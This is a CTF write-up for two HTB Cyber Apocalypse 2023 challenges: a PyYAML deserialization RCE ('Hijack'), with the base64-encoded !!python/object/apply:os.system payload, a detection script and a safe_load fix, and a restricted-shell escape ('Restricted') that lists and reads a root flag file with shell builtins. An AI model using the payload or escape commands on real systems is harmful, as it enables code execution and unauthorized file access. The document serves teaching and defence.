Contents

CTF: HTB Cyber Apocalypse 2023 Part 2

Hijack

The challenge page shows a serialized config value.

Decoding it with www.base64decode.org shows that the application is using Python as its backend, together with some kind of serialization.

By Google search I found this blog.

!!python/object/apply:os.system ["cat flag.txt"]

Encode this RCE payload in base64:

ISFweXRob24vb2JqZWN0L2FwcGx5Om9zLnN5c3RlbSBbImNhdCBmbGFnLnR4dCJdCg==


Flag: HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}
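The tag in the payload above, `!!python/object/apply`, is specific to PyYAML: it tells the unsafe loader (`yaml.load` with `yaml.Loader` or `yaml.UnsafeLoader`) to call the named callable, here `os.system`, with the listed arguments, which is what turns "parse a config" into code execution. As an added example, not code from the writeup or from the challenge, the script below decodes the base64 config value from the writeup, reports any PyYAML code-execution tags it carries, and shows the hardened loader, `yaml.safe_load`, which only knows the standard YAML types and rejects such tags. The regex, the function names and the benign config text are my own assumptions; the base64 string is the one from the writeup. PyYAML is optional here so the scanner runs with the standard library alone.

```python
import base64
import binascii
import re

try:
    import yaml  # PyYAML; optional so the scanner below still runs without it
except ImportError:
    yaml = None

# Base64 config value from the writeup: a YAML document carrying a
# PyYAML-only tag that makes the unsafe Loader call os.system.
PAYLOAD_B64 = "ISFweXRob24vb2JqZWN0L2FwcGx5Om9zLnN5c3RlbSBbImNhdCBmbGFnLnR4dCJdCg=="

# Constructed benign value: the kind of config the app presumably expects.
BENIGN_B64 = base64.b64encode(b"theme: dark\nfont_size: 12\n").decode("ascii")

# Tags that only PyYAML's unsafe/full loaders understand (assumed list). They
# instruct the loader to import modules, build arbitrary objects or call
# callables, none of which a plain config file ever needs.
PYTHON_TAG = re.compile(r"!!python/(?:object(?:/apply|/new)?|name|module)\b")


def decode_config(value: str) -> str:
    """Strictly base64-decode a serialized config value into YAML text."""
    raw = base64.b64decode(value, validate=True)
    return raw.decode("utf-8", errors="replace")


def find_python_tags(yaml_text: str) -> list[str]:
    """Return every PyYAML code-execution tag present in the YAML text."""
    return PYTHON_TAG.findall(yaml_text)


def is_suspicious_value(value: str) -> bool:
    """Detection check: True if the value is not valid base64 or smuggles a
    !!python/ tag. Useful for logging or alerting at the edge; it does not
    replace a safe loader inside the application itself."""
    try:
        text = decode_config(value)
    except (binascii.Error, ValueError):
        return True
    return bool(find_python_tags(text))


def load_config_safely(yaml_text: str):
    """Hardened loader. yaml.safe_load resolves only standard YAML types, so a
    !!python/ tag raises yaml.constructor.ConstructorError instead of running
    anything. The vulnerable form is yaml.load(text, Loader=yaml.Loader) or
    yaml.UnsafeLoader. Requires PyYAML."""
    if yaml is None:
        raise RuntimeError("PyYAML is not installed; cannot parse YAML here")
    return yaml.safe_load(yaml_text)


if __name__ == "__main__":
    for name, value in (("writeup payload", PAYLOAD_B64), ("benign", BENIGN_B64)):
        print(f"{name}: suspicious={is_suspicious_value(value)}")
        print("  tags:", find_python_tags(decode_config(value)))
```

The tag scan is only a detection aid: a loader that never constructs Python objects is the fix, and `yaml.safe_load` (or `yaml.load(text, Loader=yaml.SafeLoader)`) gives exactly that.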

Restricted

From the Dockerfile I found that the flag is being renamed to a random string with the flag_ prefix in the root directory.

So our flag file will be named something like flag_t04P0.

Commands are restricted, so to list the available commands use compgen -ac.

Let's list files using echo and a wildcard: echo /* (the shell itself expands * to everything that exists under the / root directory, so no ls binary is needed).

Our flag is inside /flag_8dpsy. Now it is time to read the contents of the file using only shell builtins:

while IFS= read -r line; do echo "$line"; done </flag_8dpsy


Flag: HTB{r35tr1ct10n5_4r3_p0w3r1355}